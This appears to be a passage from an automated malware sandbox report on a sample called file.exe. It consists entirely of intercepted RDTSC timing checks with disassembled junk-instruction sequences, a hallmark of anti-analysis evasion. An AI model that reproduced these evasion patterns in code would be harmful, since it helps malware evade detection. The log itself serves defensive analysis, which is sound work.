                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5ADCE second address: A5ADD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5ADD4 second address: A5ADDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5ADDA second address: A5ADDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A58F40 second address: A58F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A58F44 second address: A58F4A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A58F4A second address: A58F74 instructions: 0x00000000 rdtsc 0x00000002 je 00007F684904922Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6849049235h 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5927E second address: A5928D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F684908B756h 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5928D second address: A5929A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007F684904922Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5929A second address: A592A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A595C2 second address: A595CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A595CB second address: A595CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A59E99 second address: A59E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A59E9E second address: A59ED1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F684908B770h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F684908B768h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F684908B75Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A17F second address: A5A185 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A185 second address: A5A18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A4A0 second address: A5A4BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049239h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A4BD second address: A5A4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A4C3 second address: A5A501 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F684904922Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jno 00007F6849049226h 0x00000013 jmp 00007F6849049230h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c jng 00007F6849049228h 0x00000022 pushad 0x00000023 popad 0x00000024 jnc 00007F684904922Ch 0x0000002a jnp 00007F6849049226h 0x00000030 push ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A7CF second address: A5A803 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F684908B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F684908B760h 0x00000011 jnp 00007F684908B758h 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A803 second address: A5A81B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6849049231h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60435 second address: A6044B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F684908B756h 0x0000000d je 00007F684908B756h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6044B second address: A60457 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6386B second address: A6388C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007F684908B756h 0x00000009 pop esi 0x0000000a pushad 0x0000000b jmp 00007F684908B762h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6388C second address: A63892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63B12 second address: A63B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63B16 second address: A63B20 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6849049226h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63B20 second address: A63B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F684908B75Bh 0x0000000e jnp 00007F684908B756h 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63B3B second address: A63B5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049233h 0x00000007 push ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63B5B second address: A63B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007F684908B758h 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63B68 second address: A63B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63B6E second address: A63B72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63CB1 second address: A63CBA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63CBA second address: A63CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F684908B760h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63CD5 second address: A63CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7B1B second address: 9B7B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7B20 second address: 9B7B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6849049238h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7B3E second address: 9B7B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7B42 second address: 9B7B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CC30 second address: A6CC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CC34 second address: A6CC3A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CC3A second address: A6CC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CE0D second address: A6CE25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007F684904922Fh 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D0E0 second address: A6D0F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F684908B75Dh 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D247 second address: A6D255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D255 second address: A6D27C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F684908B756h 0x00000008 jmp 00007F684908B75Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 jmp 00007F684908B75Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D27C second address: A6D29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F684904922Fh 0x0000000d jnp 00007F6849049226h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D40E second address: A6D43E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F684908B756h 0x00000009 jmp 00007F684908B75Eh 0x0000000e jmp 00007F684908B765h 0x00000013 popad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D43E second address: A6D44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D44C second address: A6D450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D5F1 second address: A6D5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E2DB second address: A6E2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jng 00007F684908B756h 0x0000000c jne 00007F684908B756h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6E2F0 second address: A6E2F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6EA34 second address: A6EA3E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F684908B756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74632 second address: A7463D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6849049226h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7463D second address: A7466C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F684908B768h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F684908B756h 0x00000012 jmp 00007F684908B75Ah 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74192 second address: A74198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74198 second address: A7419D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7419D second address: A741AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 js 00007F6849049226h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76B96 second address: A76B9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76B9C second address: A76BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push edi 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F6849049226h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76BB2 second address: A76BB8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80EC1 second address: A80EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80BC6 second address: A80C00 instructions: 0x00000000 rdtsc 0x00000002 je 00007F684908B75Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F684908B76Ch 0x00000012 push edi 0x00000013 jns 00007F684908B756h 0x00000019 js 00007F684908B756h 0x0000001f pop edi 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80C00 second address: A80C11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80C11 second address: A80C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86F8D second address: A86FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 ja 00007F684904922Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86A18 second address: A86A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91DA8 second address: A91DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F6849049226h 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91DB7 second address: A91DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96FA1 second address: A96FB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F6849049226h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96FB0 second address: A96FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA04E5 second address: AA04E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA04E9 second address: AA0527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B75Dh 0x00000007 jmp 00007F684908B766h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007F684908B775h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 jmp 00007F684908B75Dh 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F0E0 second address: A9F114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Fh 0x00000007 jl 00007F6849049226h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007F684904923Bh 0x00000015 jmp 00007F6849049235h 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F26F second address: A9F280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jng 00007F684908B75Ch 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F280 second address: A9F2A2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6849049228h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F684904922Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F2A2 second address: A9F2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F78C second address: A9F7D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007F6849049231h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6849049237h 0x00000016 jmp 00007F6849049236h 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA546B second address: AA5472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5472 second address: AA5477 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5477 second address: AA547D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6AAD second address: AA6AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5989 second address: AB598F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5680 second address: AC5695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6849049226h 0x0000000a jo 00007F6849049226h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5695 second address: AC5699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5699 second address: AC56A8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6849049226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC56A8 second address: AC56B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5253 second address: AC5257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5257 second address: AC5261 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F684908B756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5261 second address: AC527B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F684904922Eh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE718 second address: ADE71C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE71C second address: ADE720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE720 second address: ADE73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F684908B75Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F684908B75Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE73C second address: ADE746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE746 second address: ADE74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE74C second address: ADE78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6849049235h 0x00000009 popad 0x0000000a jmp 00007F684904922Eh 0x0000000f jno 00007F6849049228h 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007F6849049226h 0x0000001d jnp 00007F6849049226h 0x00000023 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADEFC3 second address: ADEFCD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F684908B75Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF0F1 second address: ADF0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF0F8 second address: ADF128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B760h 0x00000007 jnc 00007F684908B75Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F684908B75Eh 0x00000016 rdtsc
